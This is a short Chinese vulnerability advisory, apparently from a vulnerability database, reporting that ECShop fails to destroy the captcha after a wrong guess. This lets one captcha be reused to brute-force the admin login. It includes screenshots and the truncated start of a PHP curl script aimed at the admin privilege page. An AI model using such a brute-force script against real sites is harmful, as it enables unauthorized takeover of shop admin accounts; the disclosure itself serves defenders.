ecshop绕过验证码暴利破解

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 应该流行的版本都存在此问题 ### 详细说明: [<img src="https://images.seebug.org/upload/201306/031052155bc2a633acc7f218ab49bf4514316332.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/031052155bc2a633acc7f218ab49bf4514316332.png) [<img src="https://images.seebug.org/upload/201306/03105232b4e2c86353c3ff0eb989026ab3aece46.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/03105232b4e2c86353c3ff0eb989026ab3aece46.png) 若验证码不匹配,并没有销毁当前验证码 所以就可以一次请求验证码图片后,只要不再刷新验证码就可以一直使用 ### 漏洞证明: 1.获取正确的验证码 2. ``` <?php $site='http://ecshop.com'; $admin_path='/admin/privilege.php'; $captcha='上一步获取的验证码'; $referer=$site; function getH($url,$postdata=array()){ global $ch,$referer; $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => false, CURLOPT_TIMEOUT=> 0.11, //CURLOPT_FILE=>$f, CURLOPT_RETURNTRANSFER=>true, CURLOPT_REFERER=>$referer, //CURLOPT_POST=>1, CURLOPT_HTTPHEADER=>array('Content-Type:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息